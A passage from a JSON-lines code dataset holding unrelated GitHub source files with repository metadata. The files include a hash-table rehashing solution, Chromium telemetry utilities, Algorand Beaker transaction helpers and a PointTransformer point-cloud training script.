Pages'\n# but you can specify specific pages if this is True\nallow_target_pages = True\nmax_catalog_pages = 30 # set to None to do all\narticle_namespace_only = False # do not list links to non article wiki pages\nactually_edit = True # if false only prints dictionary of redlinks does not post\nusers_to_notify_on_error = ['Lonjers', 
'Wugapodes']\n","repo_name":"utilitarianexe/most_requested_wiki_articles_bot","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"36089127606","text":"\"\"\"\nDefinition of ListNode\nclass ListNode(object):\n\n def __init__(self, val, next=None):\n self.val = val\n self.next = next\n\"\"\"\nclass Solution:\n \"\"\"\n @param hashTable: A list of The first node of linked list\n @return: A list of The first node of linked list which have twice size\n \"\"\"\n def hashItem(self, item, new_hashTable):\n \tsize = len(new_hashTable)\n \tval = item.val % size\n \tif new_hashTable[val] == None:\n \t\tnew_hashTable[val] = ListNode(item.val)\n \telse:\n \t\ttmp = new_hashTable[val]\n \t\twhile tmp.next:\n \t\t\ttmp = tmp.next\n \t\ttmp.next = ListNode(item.val)\n\n def rehashing(self, hashTable):\n # write your code here\n size = len(hashTable) * 2\n new_hashTable = [None for i in range(size)]\n for item in hashTable:\n \tif item:\n \t\ttmp = item\n \t\twhile tmp:\n \t\t\tself.hashItem(tmp, new_hashTable)\n \t\t\ttmp = tmp.next\n return new_hashTable\n\n\n\n\n\n\n","repo_name":"chengchengXCC/interview_questions","sub_path":"LintCode/1st_round_fail/129.py","file_name":"129.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5855389090","text":"import glob\nimport imp\nimport inspect\nimport logging\nimport os\nimport socket\nimport sys\nimport time\n\nfrom telemetry.core import exceptions\n\n\ndef GetBaseDir():\n main_module = sys.modules['__main__']\n if hasattr(main_module, '__file__'):\n return os.path.dirname(os.path.abspath(main_module.__file__))\n else:\n return os.getcwd()\n\n\ndef GetTelemetryDir():\n return os.path.normpath(os.path.join(\n __file__, os.pardir, os.pardir, os.pardir))\n\n\ndef GetTelemetryThirdPartyDir():\n return os.path.normpath(os.path.join(\n __file__, os.pardir, os.pardir, os.pardir, 'third_party'))\n\n\ndef GetUnittestDataDir():\n return os.path.join(GetTelemetryDir(),\n 'telemetry', 'internal', 'testing')\n\n\ndef GetChromiumSrcDir():\n return os.path.normpath(os.path.join(GetTelemetryDir(), os.pardir, os.pardir))\n\n\ndef AddDirToPythonPath(*path_parts):\n path = os.path.abspath(os.path.join(*path_parts))\n if os.path.isdir(path) and path not in sys.path:\n sys.path.insert(0, path)\n\n_counter = [0]\ndef _GetUniqueModuleName():\n _counter[0] += 1\n return \"page_set_module_\" + str(_counter[0])\n\ndef GetPythonPageSetModule(file_path):\n return imp.load_source(_GetUniqueModuleName(), file_path)\n\n\ndef WaitFor(condition, timeout):\n \"\"\"Waits for up to |timeout| secs for the function |condition| to return True.\n\n Polling frequency is (elapsed_time / 10), with a min of .1s and max of 5s.\n\n Returns:\n Result of |condition| function (if present).\n \"\"\"\n min_poll_interval = 0.1\n max_poll_interval = 5\n output_interval = 300\n\n def GetConditionString():\n if condition.__name__ == '':\n try:\n return inspect.getsource(condition).strip()\n except IOError:\n pass\n return condition.__name__\n\n start_time = time.time()\n last_output_time = start_time\n while True:\n res = condition()\n if res:\n return res\n now = time.time()\n elapsed_time = now - start_time\n last_output_elapsed_time = now - last_output_time\n if elapsed_time > timeout:\n raise exceptions.TimeoutException('Timed out while waiting %ds for %s.' 
%\n                                        (timeout, GetConditionString()))\n    if last_output_elapsed_time > output_interval:\n      logging.info('Continuing to wait %ds for %s. Elapsed: %ds.',\n                   timeout, GetConditionString(), elapsed_time)\n      last_output_time = time.time()\n    poll_interval = min(max(elapsed_time / 10., min_poll_interval),\n                        max_poll_interval)\n    time.sleep(poll_interval)\n\n\ndef GetUnreservedAvailableLocalPort():\n  \"\"\"Returns an available port on the system.\n\n  WARNING: This method does not reserve the port it returns, so it may be used\n  by something else before you get to use it. This can lead to flake.\n  \"\"\"\n  tmp = socket.socket()\n  tmp.bind(('', 0))\n  port = tmp.getsockname()[1]\n  tmp.close()\n\n  return port\n\n\ndef GetBuildDirectories():\n  \"\"\"Yields all combinations of Chromium build output directories.\"\"\"\n  build_dirs = ['build',\n                os.path.basename(os.environ.get('CHROMIUM_OUT_DIR', 'out')),\n                'xcodebuild']\n\n  build_types = ['Debug', 'Debug_x64', 'Release', 'Release_x64']\n\n  for build_dir in build_dirs:\n    for build_type in build_types:\n      yield build_dir, build_type\n\n\ndef GetSequentialFileName(base_name):\n  \"\"\"Returns the next sequential file name based on |base_name| and the\n  existing files. base_name should not contain extension.\n  e.g: if base_name is /tmp/test, and /tmp/test_000.json,\n  /tmp/test_001.mp3 exist, this returns /tmp/test_002. In case no\n  other sequential file name exists, this will return /tmp/test_000\n  \"\"\"\n  name, ext = os.path.splitext(base_name)\n  assert ext == '', 'base_name cannot contain file extension.'\n  index = 0\n  while True:\n    output_name = '%s_%03d' % (name, index)\n    if not glob.glob(output_name + '.*'):\n      break\n    index = index + 1\n  return output_name\n\ndef IsRunningOnCrosDevice():\n  \"\"\"Returns True if we're on a ChromeOS device.\"\"\"\n  lsb_release = '/etc/lsb-release'\n  if sys.platform.startswith('linux') and os.path.exists(lsb_release):\n    with open(lsb_release, 'r') as f:\n      res = f.read()\n    if res.count('CHROMEOS_RELEASE_NAME'):\n      return True\n  return False\n","repo_name":"googlearchive/big-rig","sub_path":"app/src/thirdparty/telemetry/core/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4229,"program_lang":"python","lang":"en","doc_type":"code","stars":857,"dataset":"github-code","pt":"61"} +{"seq_id":"2025065811","text":"import sys\nfrom collections import deque\n\nqueue = deque()\n\nn = int(input())\n\n# push 1..n into the queue\nfor i in range(n):\n    queue.append(i + 1)\n\n# until one card remains:\nwhile len(queue) > 1:\n    queue.popleft()\n    if len(queue) < 1:\n        break\n    queue.append(queue.popleft())\n\n# print the last remaining card\nif queue:\n    print(queue[0])\n\n    ","repo_name":"yechan9601/Algorithm-ProblemSolving","sub_path":"algorithm/silver/2164.py","file_name":"2164.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33864495044","text":"from organization.views import OrgDetailTeachersView,OrgDetailHomePageView,TeachersListView,OrgDetailDescView,OrgListView,OrgDetailCourseView\nfrom django.urls import path,include,re_path\n\nurlpatterns = [\n    path('org-detail-course/',OrgDetailCourseView.as_view(),name='org_detail_course'),\n    path('org-detail-desc/',OrgDetailDescView.as_view(),name='org_detail_desc'),\n    path('org-detail-homepage/',OrgDetailHomePageView.as_view(),name='org_detail_homepage'),\n    path('org-detail-teachers/',OrgDetailTeachersView.as_view(),name='org_detail_teachers'),\n    path('teachers-list/',TeachersListView.as_view(),name='teachers-list'),\n    
path('orglist/',OrgListView.as_view(),name='orglist'),\n]\n","repo_name":"TheFifthMan/imooc","sub_path":"apps/organization/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40465373066","text":"#app that finds the surface area and volume of a cylinder\r\nwhile True:\r\n    x=int(input(\"press 1 for the cylinder's surface area, 2 for its volume, 3 to exit.\"))\r\n    pi=3.14\r\n    if(x==1 or x==2):\r\n        r=float(input(\"enter the radius of your cylinder:\"))\r\n        h=float(input(\"enter the height of your cylinder:\"))\r\n        if x==1:\r\n            ya=((2*pi*r)*h)+(2*pi*r*r)\r\n            print(\"surface area of your cylinder:\",ya)\r\n        elif x==2:\r\n            v=(pi*r*r)*h\r\n            print(\"volume of your cylinder:\",v)\r\n    elif x==3:\r\n        print(\"exiting.\")\r\n        break\r\n    else:\r\n        print(\"please enter a valid value.\")\r\n\r\n\r\n","repo_name":"silacakmak/calisma","sub_path":"silindir.py","file_name":"silindir.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21096334726","text":"from base64 import b64decode\nimport copy\nfrom math import ceil\nfrom typing import Any, cast\n\nfrom algosdk.account import address_from_private_key\nfrom algosdk.atomic_transaction_composer import (\n    TransactionSigner,\n    AccountTransactionSigner,\n    MultisigTransactionSigner,\n    LogicSigTransactionSigner,\n    AtomicTransactionComposer,\n    ABI_RETURN_HASH,\n    TransactionWithSigner,\n    abi,\n)\nfrom algosdk.future import transaction\nfrom algosdk.logic import get_application_address\nfrom algosdk.source_map import SourceMap\nfrom algosdk.v2client.algod import AlgodClient\nfrom algosdk.constants import APP_PAGE_MAX_SIZE\n\nfrom beaker.application import Application, get_method_spec\nfrom beaker.decorators import (\n    HandlerFunc,\n    MethodHints,\n    DefaultArgument,\n    DefaultArgumentClass,\n)\nfrom beaker.client.state_decode import decode_state\nfrom beaker.client.logic_error import LogicException\nfrom beaker.client.application_client import ApplicationClient\nimport algosdk\nfrom config import player\nfrom algorand import sp\n\ndef get_transaction(atc: AtomicTransactionComposer, i: int):\n    tws: TransactionWithSigner = atc.build_group()[i]\n    txn = tws.txn.dictify()\n    if \"grp\" in txn: del txn[\"grp\"]\n    tws.txn = transaction.Transaction.undictify(txn)\n    return tws\n\ndef remove_group(tws: TransactionWithSigner):\n    txn = tws.txn.dictify()\n    if \"grp\" in txn: del txn[\"grp\"]\n    tws.txn = transaction.Transaction.undictify(txn)\n    return tws\n\ndef finalize(appclient: ApplicationClient, atc: AtomicTransactionComposer):\n    try:\n        opt_in_result = atc.execute(appclient.client, 4)\n    except Exception as e:\n        if \"logic\" in str(e):\n            raise appclient.wrap_approval_exception(e)\n        else:\n            raise e\n\n    return opt_in_result.tx_ids[0]\n\ndef create_atc_from_kwargs(kwargs):\n    atc = AtomicTransactionComposer()\n    for k,arg in kwargs.items():\n        if type(arg) == AtomicTransactionComposer:\n            txns = arg.build_group()\n            for i in range(0, len(txns)-1):\n                atc.add_transaction(remove_group(txns[i]))\n            kwargs[k] = remove_group(txns[-1])\n    return atc \n\ndef create_nosend(\n    appclient: ApplicationClient,\n    sender: str = None,\n    signer: TransactionSigner = None,\n    args: list[Any] = None,\n    suggested_params: transaction.SuggestedParams = None,\n    on_complete: transaction.OnComplete = transaction.OnComplete.NoOpOC,\n    extra_pages: int = None,\n    **kwargs,\n) -> 
AtomicTransactionComposer:\n \"\"\"Submits a signed ApplicationCallTransaction with application id == 0 and the schema and source from the Application passed\"\"\"\n\n appclient.build()\n assert appclient.clear_binary is not None and appclient.approval_binary is not None\n\n if extra_pages is None:\n extra_pages = ceil(\n (\n (len(appclient.approval_binary) + len(appclient.clear_binary))\n - APP_PAGE_MAX_SIZE\n )\n / APP_PAGE_MAX_SIZE\n )\n\n sp = appclient.get_suggested_params(suggested_params)\n signer = appclient.get_signer(signer)\n sender = appclient.get_sender(sender, signer)\n\n atc = create_atc_from_kwargs(kwargs)\n if appclient.app.on_create is not None:\n appclient.add_method_call(\n atc,\n appclient.app.on_create,\n sender=sender,\n suggested_params=sp,\n on_complete=on_complete,\n approval_program=appclient.approval_binary,\n clear_program=appclient.clear_binary,\n global_schema=appclient.app.app_state.schema(),\n local_schema=appclient.app.acct_state.schema(),\n extra_pages=extra_pages,\n app_args=args,\n **kwargs,\n )\n else:\n atc.add_transaction(\n TransactionWithSigner(\n txn=transaction.ApplicationCreateTxn(\n sender=sender,\n sp=sp,\n on_complete=on_complete,\n approval_program=appclient.approval_binary,\n clear_program=appclient.clear_binary,\n global_schema=appclient.app.app_state.schema(),\n local_schema=appclient.app.acct_state.schema(),\n extra_pages=extra_pages,\n app_args=args,\n **kwargs,\n ),\n signer=signer,\n )\n )\n\n return atc\n\ndef update_nosend(\n appclient: ApplicationClient,\n sender: str = None,\n signer: TransactionSigner = None,\n args: list[Any] = None,\n suggested_params: transaction.SuggestedParams = None,\n **kwargs,\n) -> AtomicTransactionComposer:\n\n \"\"\"Submits a signed ApplicationCallTransaction with OnComplete set to UpdateApplication and source from the Application passed\"\"\"\n appclient.build()\n\n sp = appclient.get_suggested_params(suggested_params)\n signer = appclient.get_signer(signer)\n sender = appclient.get_sender(sender, signer)\n\n atc = create_atc_from_kwargs(kwargs)\n if appclient.app.on_update is not None:\n appclient.add_method_call(\n atc,\n appclient.app.on_update,\n on_complete=transaction.OnComplete.UpdateApplicationOC,\n sender=sender,\n suggested_params=sp,\n index=appclient.app_id,\n approval_program=appclient.approval_binary,\n clear_program=appclient.clear_binary,\n app_args=args,\n **kwargs,\n )\n else:\n atc.add_transaction(\n TransactionWithSigner(\n txn=transaction.ApplicationUpdateTxn(\n sender=sender,\n sp=sp,\n index=appclient.app_id,\n approval_program=appclient.approval_binary,\n clear_program=appclient.clear_binary,\n app_args=args,\n **kwargs,\n ),\n signer=signer,\n )\n )\n\n return atc\n\ndef opt_in_nosend(\n appclient: ApplicationClient,\n sender: str = None,\n signer: TransactionSigner = None,\n args: list[Any] = None,\n suggested_params: transaction.SuggestedParams = None,\n **kwargs,\n) -> AtomicTransactionComposer:\n \"\"\"Submits a signed ApplicationCallTransaction with OnComplete set to OptIn\"\"\"\n\n sp = appclient.get_suggested_params(suggested_params)\n signer = appclient.get_signer(signer)\n sender = appclient.get_sender(sender, signer)\n\n atc = create_atc_from_kwargs(kwargs)\n if appclient.app.on_opt_in is not None:\n appclient.add_method_call(\n atc,\n appclient.app.on_opt_in,\n on_complete=transaction.OnComplete.OptInOC,\n sender=sender,\n suggested_params=sp,\n index=appclient.app_id,\n app_args=args,\n signer=signer,\n **kwargs,\n )\n else:\n atc.add_transaction(\n 
TransactionWithSigner(\n                txn=transaction.ApplicationOptInTxn(\n                    sender=sender,\n                    sp=sp,\n                    index=appclient.app_id,\n                    app_args=args,\n                    **kwargs,\n                ),\n                signer=signer,\n            )\n        )\n\n    return atc\n\ndef close_out_nosend(\n    appclient: ApplicationClient,\n    sender: str = None,\n    signer: TransactionSigner = None,\n    args: list[Any] = None,\n    suggested_params: transaction.SuggestedParams = None,\n    **kwargs,\n) -> AtomicTransactionComposer:\n    \"\"\"Builds (without sending) an ApplicationCallTransaction with OnComplete set to CloseOut\"\"\"\n\n    sp = appclient.get_suggested_params(suggested_params)\n    signer = appclient.get_signer(signer)\n    sender = appclient.get_sender(sender, signer)\n\n    atc = create_atc_from_kwargs(kwargs)\n    if appclient.app.on_close_out is not None:\n        appclient.add_method_call(\n            atc,\n            appclient.app.on_close_out,\n            on_complete=transaction.OnComplete.CloseOutOC,\n            sender=sender,\n            suggested_params=sp,\n            index=appclient.app_id,\n            app_args=args,\n            signer=signer,\n            **kwargs,\n        )\n    else:\n        atc.add_transaction(\n            TransactionWithSigner(\n                txn=transaction.ApplicationCloseOutTxn(\n                    sender=sender,\n                    sp=sp,\n                    index=appclient.app_id,\n                    app_args=args,\n                    **kwargs,\n                ),\n                signer=signer,\n            )\n        )\n\n    return atc\n\ndef clear_state_nosend(\n    appclient: ApplicationClient,\n    sender: str = None,\n    signer: TransactionSigner = None,\n    args: list[Any] = None,\n    suggested_params: transaction.SuggestedParams = None,\n    **kwargs,\n) -> AtomicTransactionComposer:\n\n    \"\"\"Builds (without sending) an ApplicationCallTransaction with OnComplete set to ClearState\"\"\"\n\n    sp = appclient.get_suggested_params(suggested_params)\n    signer = appclient.get_signer(signer)\n    sender = appclient.get_sender(sender, signer)\n\n    atc = create_atc_from_kwargs(kwargs)\n    if appclient.app.on_clear_state is not None:\n        appclient.add_method_call(\n            atc,\n            appclient.app.on_clear_state,\n            on_complete=transaction.OnComplete.ClearStateOC,\n            sender=sender,\n            suggested_params=sp,\n            index=appclient.app_id,\n            app_args=args,\n            signer=signer,\n            **kwargs,\n        )\n    else:\n        atc.add_transaction(\n            TransactionWithSigner(\n                txn=transaction.ApplicationClearStateTxn(\n                    sender=sender,\n                    sp=sp,\n                    index=appclient.app_id,\n                    app_args=args,\n                    **kwargs,\n                ),\n                signer=signer,\n            )\n        )\n\n    return atc\n\ndef delete_nosend(\n    appclient: ApplicationClient,\n    sender: str = None,\n    signer: TransactionSigner = None,\n    args: list[Any] = None,\n    suggested_params: transaction.SuggestedParams = None,\n    **kwargs,\n) -> AtomicTransactionComposer:\n    \"\"\"Builds (without sending) an ApplicationCallTransaction with OnComplete set to DeleteApplication\"\"\"\n\n    sp = appclient.get_suggested_params(suggested_params)\n    signer = appclient.get_signer(signer)\n    sender = appclient.get_sender(sender, signer)\n\n    atc = create_atc_from_kwargs(kwargs)\n    if appclient.app.on_delete:\n        appclient.add_method_call(\n            atc,\n            appclient.app.on_delete,\n            on_complete=transaction.OnComplete.DeleteApplicationOC,\n            sender=sender,\n            suggested_params=sp,\n            index=appclient.app_id,\n            app_args=args,\n            signer=signer,\n            **kwargs,\n        )\n    else:\n        atc.add_transaction(\n            TransactionWithSigner(\n                txn=transaction.ApplicationDeleteTxn(\n                    sender=sender,\n                    sp=sp,\n                    index=appclient.app_id,\n                    app_args=args,\n                    **kwargs,\n                ),\n                signer=signer,\n            )\n        )\n\n    return atc\n
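\n# A minimal usage sketch of the *_nosend builders (illustrative only; some_address\n# and some_signer are placeholder names, not identifiers from this repo):\n#\n#   atc = opt_in_nosend(appclient, sender=some_address, signer=some_signer)\n#   tx_id = finalize(appclient, atc)  # signs, submits, waits up to 4 rounds\n#\n# Each builder returns an AtomicTransactionComposer without submitting it, so\n# callers can keep grouping transactions before finalize() sends the whole group.\n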
\ndef call_nosend(\n    appclient: ApplicationClient,\n    method: abi.Method | HandlerFunc,\n    sender: str = None,\n    signer: TransactionSigner = None,\n    suggested_params: transaction.SuggestedParams = None,\n    on_complete: transaction.OnComplete = transaction.OnComplete.NoOpOC,\n    local_schema: transaction.StateSchema = None,\n    global_schema: transaction.StateSchema = None,\n    approval_program: bytes = None,\n    clear_program: bytes = None,\n    extra_pages: int = None,\n    accounts: list[str] = None,\n    foreign_apps: list[int] = None,\n    foreign_assets: list[int] = None,\n    note: bytes = None,\n    lease: bytes = None,\n    rekey_to: str = None,\n    **kwargs,\n) -> AtomicTransactionComposer:\n\n    \"\"\"Builds an application call; read-only methods are instead executed via dryrun and their parsed result returned\"\"\"\n\n    if not isinstance(method, abi.Method):\n        method = get_method_spec(method)\n\n    hints = appclient.method_hints(method.name)\n\n    atc = create_atc_from_kwargs(kwargs)\n\n    atc = appclient.add_method_call(\n        atc,\n        method,\n        sender,\n        signer,\n        suggested_params=suggested_params,\n        on_complete=on_complete,\n        local_schema=local_schema,\n        global_schema=global_schema,\n        approval_program=approval_program,\n        clear_program=clear_program,\n        extra_pages=extra_pages,\n        accounts=accounts,\n        foreign_apps=foreign_apps,\n        foreign_assets=foreign_assets,\n        note=note,\n        lease=lease,\n        rekey_to=rekey_to,\n        **kwargs,\n    )\n    # If it's a read-only method, use dryrun (TODO: swap with simulate later?)\n    if hints.read_only:\n        dr_req = transaction.create_dryrun(appclient.client, atc.gather_signatures())\n        dr_result = appclient.client.dryrun(dr_req)\n        method_results = appclient._parse_result(\n            {0: method}, dr_result[\"txns\"], atc.tx_ids\n        )\n        return method_results.pop()\n\n    return atc\n","repo_name":"Geladen/algorand-games-platform","sub_path":"src/algogames/beaker2.py","file_name":"beaker2.py","file_ext":"py","file_size_in_byte":13066,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"72270606913","text":"import os\n\n\nlogo = '''\n ___________\n \\ /\n )_______(\n |\"\"\"\"\"\"\"|_.-._,.---------.,_.-._\n | | | | | | ''-.\n | |_| |_ _| |_..-'\n |_______| '-' `'---------'` '-'\n )\"\"\"\"\"\"\"(\n /_________\\\\\n .-------------.\n /_______________\\\\\n'''\n\n\n\nbidLog={}\nflag = False\ndef getBid():\n    name=input(\"Enter your name : \")\n    bid=int(input(\"Enter your bid : $\"))\n    bidLog[name]=bid\ndef getWinner(bids):\n    bid=0\n    name=\"\"\n    for key in bids:\n        if bids[key]>bid:\n            name=key\n            bid=bids[key]\n    winner={}\n    winner[name]=bid\n    return winner\n\n\n\nwhile not flag:\n    print(logo)\n    getBid()\n    choice=input(\"Are there any other bidders? 
Y: yes, N: no -> \").lower()\n    if choice==\"n\":\n        flag = True\n    os.system('cls')\n\n\nwinner=getWinner(bidLog)\nfor key in winner:\n    print(f\"The winner is {key} with a bid of ${winner[key]}.\")\n    input()\n\n\n\n\n","repo_name":"shailparmar03/PythonProjects","sub_path":"secretAuction.py","file_name":"secretAuction.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24231505513","text":"temperatures = [10, -20, -289, 100]\n\ndef c_to_f(c):\n    f = c * 9/5 + 32\n    return float(f)\n\ndef writer(temps, fileName):\n    with open(fileName, 'w') as fileToWrite:\n        for t in temps:\n            if t > -273.15:\n                print(\"Writing result of conversion for temperature %s\" % (t))\n                fileToWrite.write(str(c_to_f(t))+'\\n')\n            else:\n                print(\"Temperature %s is lower than allowed\" % (t))\n\nwriter(temperatures, 'fileToWrite.txt')\n\n\n\n\n\n#with open('fileToWrite', 'w') as fileToWrite:\n#    fileToWrite.write('some text')\n#    fileToWrite.close()\n","repo_name":"sdulebskiy/udemy_python_course","sub_path":"File Handling, Loops, Functions, and Conditionals/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71965184194","text":"import os\nos.environ[\"NCCL_IB_DISABLE\"] = '1'\nimport sys\n\nDIR_PATH = os.path.dirname(__file__)\nROOT_PATH = os.path.dirname(DIR_PATH)\nsys.path.insert(0, DIR_PATH)\nsys.path.insert(0, ROOT_PATH)\n\nimport time\nimport random\nimport numpy as np\nimport logging\nimport argparse\nimport shutil\n\nnp.set_printoptions(precision=4, linewidth=200)\n\nimport torch\nimport torch.backends.cudnn as cudnn\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.optim\nimport torch.utils.data\nimport torch.multiprocessing as mp\nimport torch.distributed as dist\nimport torch.optim.lr_scheduler as lr_scheduler\nfrom tensorboardX import SummaryWriter\n\nfrom util import config\nfrom util.s3dis import S3DIS\nfrom util.common_util import AverageMeter, intersectionAndUnionGPU, find_free_port\nfrom util.data_util import collate_fn\nfrom util import transform as t\nfrom util.logger import *\nfrom util.config import CfgNode\n\ndef _try_eval(s):\n    try:\n        s = eval(s)\n    except:\n        pass\n    return s\n\ndef get_parser():\n    parser = argparse.ArgumentParser(description='PyTorch Point Cloud Semantic Segmentation')\n    parser.add_argument('--config', type=str, default='config/s3dis/s3dis_pointtransformer_repro.yaml', help='config file')\n    parser.add_argument('--set', type=str, default=None, help='command line setting k-v tuples')\n    parser.add_argument('opts', help='see config/s3dis/s3dis_pointtransformer_repro.yaml for all options', default=None, nargs=argparse.REMAINDER)\n    args = parser.parse_args()\n    assert args.config is not None\n    cfg = config.load_cfg_from_cfg_file(args.config)\n    if args.opts is not None:\n        cfg = config.merge_cfg_from_list(cfg, args.opts)\n\n\n    if args.set:\n        for kv in args.set.split(';'):\n            if kv.startswith('{') and kv.endswith('}'):\n                kv = eval(kv)\n            else:\n                kv = dict([[i.strip() for i in t.split(':')] for t in kv.split(',')])\n            kv = {_try_eval(k): _try_eval(v) for k, v in kv.items()}\n            for k, v in kv.items():\n                setattr(cfg, k, v)\n    if not cfg.save_path:\n        cfg_dir, cfg_yaml = args.config.split(os.sep)[-2:]\n        cfg.save_path = os.path.join('results', cfg_dir, '.'.join(cfg_yaml.split('.')[:-1]))  # results / s3dis / origin\n    cfg = CfgNode(cfg, default='')\n\n    print_dict(cfg, 
head='>>> ======== config ======== >>>')\n    return cfg\n\n\ndef get_logger():\n    logger_name = \"main-logger\"\n    logger = logging.getLogger(logger_name)\n    logger.setLevel(logging.INFO)\n    handler = logging.StreamHandler()\n    fmt = \"[%(asctime)s %(levelname)s %(filename)s line %(lineno)d %(process)d] %(message)s\"\n    handler.setFormatter(logging.Formatter(fmt))\n    logger.addHandler(handler)\n    return logger\n\n\ndef worker_init_fn(worker_id):\n    random.seed(args.manual_seed + worker_id)\n\n\ndef main_process():\n    return not args.multiprocessing_distributed or (args.multiprocessing_distributed and args.rank % args.ngpus_per_node == 0)\n\n\ndef main():\n    args = get_parser()\n    os.environ[\"CUDA_VISIBLE_DEVICES\"] = ','.join(str(x) for x in args.train_gpu)\n    if 'debug' in args and args.debug:\n        os.environ['CUDA_LAUNCH_BLOCKING'] = '1'\n\n    if args.manual_seed is not None:\n        random.seed(args.manual_seed)\n        np.random.seed(args.manual_seed)\n        torch.manual_seed(args.manual_seed)\n        torch.cuda.manual_seed(args.manual_seed)\n        torch.cuda.manual_seed_all(args.manual_seed)\n        cudnn.benchmark = False\n        cudnn.deterministic = True\n    if args.dist_url == \"env://\" and args.world_size == -1:\n        args.world_size = int(os.environ[\"WORLD_SIZE\"])\n    args.distributed = args.world_size > 1 or args.multiprocessing_distributed\n    args.ngpus_per_node = len(args.train_gpu)\n    if len(args.train_gpu) == 1:\n        args.sync_bn = False\n        args.distributed = False\n        args.multiprocessing_distributed = False\n\n    if args.data_name == 's3dis':\n        S3DIS(args, split='train', data_root=args.data_root, test_area=args.test_area)\n        S3DIS(args, split='val', data_root=args.data_root, test_area=args.test_area)\n    else:\n        raise NotImplementedError()\n    if args.multiprocessing_distributed:\n        port = find_free_port()\n        args.dist_url = f\"tcp://localhost:{port}\"\n        args.world_size = args.ngpus_per_node * args.world_size\n        mp.spawn(main_worker, nprocs=args.ngpus_per_node, args=(args.ngpus_per_node, args))\n    else:\n        main_worker(args.train_gpu, args.ngpus_per_node, args)\n\n\ndef main_worker(gpu, ngpus_per_node, argss):\n    \"\"\" per-gpu worker\n    \"\"\"\n    global args, best_iou\n    args, best_iou = argss, 0\n    if args.distributed:\n        if args.dist_url == \"env://\" and args.rank == -1:\n            args.rank = int(os.environ[\"RANK\"])\n        if args.multiprocessing_distributed:\n            args.rank = args.rank * ngpus_per_node + gpu\n        dist.init_process_group(backend=args.dist_backend, init_method=args.dist_url, world_size=args.world_size, rank=args.rank)\n\n    if args.arch == 'pointtransformer_seg_repro':\n        from model.pointtransformer_seg import pointtransformer_seg_repro as Model\n    else:\n        raise Exception('architecture {} not supported yet'.format(args.arch))\n    model = Model(c=args.fea_dim, k=args.classes, config=args)\n    if args.sync_bn:\n        model = nn.SyncBatchNorm.convert_sync_batchnorm(model)\n    from model.pointtransformer_seg import Loss\n    criterion = Loss(config=args)\n    # criterion = nn.CrossEntropyLoss(ignore_index=args.ignore_label).cuda()\n\n    optimizer = torch.optim.SGD(model.parameters(), lr=args.base_lr, momentum=args.momentum, weight_decay=args.weight_decay)\n\n    scheduler = args.scheduler if 'scheduler' in args and args.scheduler else CfgNode({'name': 'multistep', 'milestones': [0.6, 0.8], 'gamma': 0.1})\n    if scheduler.name == 'multistep':\n        gamma = scheduler.gamma if 'gamma' in scheduler else 0.1\n        milestones = scheduler.milestones if 'milestones' in scheduler else [0.6, 0.8]\n        assert all([0 < s and s < 1 for s in milestones]), f'invalid milestones ( <0 or >1 ) - {milestones}'\n
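        # e.g. with epochs=100 and milestones=[0.6, 0.8], the learning rate is\n        # multiplied by gamma at epochs 60 and 80: fractional milestones are scaled by args.epochs\n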
        scheduler = lr_scheduler.MultiStepLR(optimizer, milestones=[int(args.epochs * s) for s in milestones], gamma=gamma)\n    elif scheduler.name == 'step':\n        scheduler = lr_scheduler.StepLR(optimizer, **{k: v for k, v in scheduler.items() if k != 'name'})\n    else:\n        raise ValueError(f'unsupported scheduler = {scheduler.name} : \\n{scheduler}')\n\n    if main_process():\n        global logger, writer\n        logger = get_logger()\n        writer = SummaryWriter(args.save_path)\n        logger.info(args)\n        logger.info(\"=> creating model ...\")\n        logger.info(\"Classes: {}\".format(args.classes))\n        logger.info(model)\n        logger.info(criterion)\n    if args.distributed:\n        torch.cuda.set_device(gpu)\n        args.batch_size = int(args.batch_size / ngpus_per_node)\n        args.batch_size_val = int(args.batch_size_val / ngpus_per_node)\n        args.workers = args.workers\n        model = torch.nn.parallel.DistributedDataParallel(\n            model.cuda(),\n            device_ids=[gpu],\n            find_unused_parameters=True if \"transformer\" in args.arch else False\n        )\n    else:\n        model = torch.nn.DataParallel(model.cuda())\n\n    if args.distributed and sum(p.numel() for p in criterion.parameters() if p.requires_grad):\n        criterion = torch.nn.parallel.DistributedDataParallel(\n            criterion.cuda(),\n            device_ids=[gpu],\n            find_unused_parameters=True if \"transformer\" in args.arch else False\n        )\n    else:\n        criterion = criterion.cuda()\n\n    if args.weight:\n        if os.path.isfile(args.weight):\n            if main_process():\n                logger.info(\"=> loading weight '{}'\".format(args.weight))\n            checkpoint = torch.load(args.weight)\n            model.load_state_dict(checkpoint['state_dict'])\n            if main_process():\n                logger.info(\"=> loaded weight '{}'\".format(args.weight))\n        else:\n            logger.info(\"=> no weight found at '{}'\".format(args.weight))\n\n    if args.resume:\n        if os.path.isfile(args.resume):\n            if main_process():\n                logger.info(\"=> loading checkpoint '{}'\".format(args.resume))\n            checkpoint = torch.load(args.resume, map_location=lambda storage, loc: storage.cuda())\n            args.start_epoch = checkpoint['epoch']\n            model.load_state_dict(checkpoint['state_dict'], strict=True)\n            optimizer.load_state_dict(checkpoint['optimizer'])\n            scheduler.load_state_dict(checkpoint['scheduler'])\n            #best_iou = 40.0\n            best_iou = checkpoint['best_iou']\n            if main_process():\n                logger.info(\"=> loaded checkpoint '{}' (epoch {})\".format(args.resume, checkpoint['epoch']))\n        else:\n            if main_process():\n                logger.info(\"=> no checkpoint found at 